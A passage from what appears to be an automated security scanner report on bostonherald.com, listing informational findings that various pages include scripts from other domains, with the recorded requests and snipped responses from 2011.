Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:14:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 63183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.zap2it.com/tvlistings/zcConnector.jsp?ap=ptg&v=2&aid=bostonher&zip=02118"></script>
...[SNIP]...
</style>

<script type="text/JavaScript" src="http://blog.zap2it.com/ithappenedlastnight/zap2it-editorial-widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.638. http://www.bostonherald.com/entertainment/travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/travel/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /entertainment/travel/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 57734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.639. http://www.bostonherald.com/extras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/extras/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /extras/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.640. http://www.bostonherald.com/gift_guide/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/gift_guide/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://q1digital.checkm8.com/adam/cm8adam_1_call.js

Request

GET /gift_guide/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 75381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.641. http://www.bostonherald.com/homepage.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/homepage.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121

Request

GET /homepage.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.642. http://www.bostonherald.com/index.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/index.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/carousel.js
http://cache.heraldinteractive.com/js/common.js?nocache=123
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028
http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092
http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077
http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121

Request

GET /index.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.643. http://www.bostonherald.com/intra/hashtag/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/intra/hashtag/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /intra/hashtag/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:14:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.644. http://www.bostonherald.com/jobfind/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/jobfind/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://edge.quantserve.com/quant.js

Request

GET /jobfind/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:02:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60213

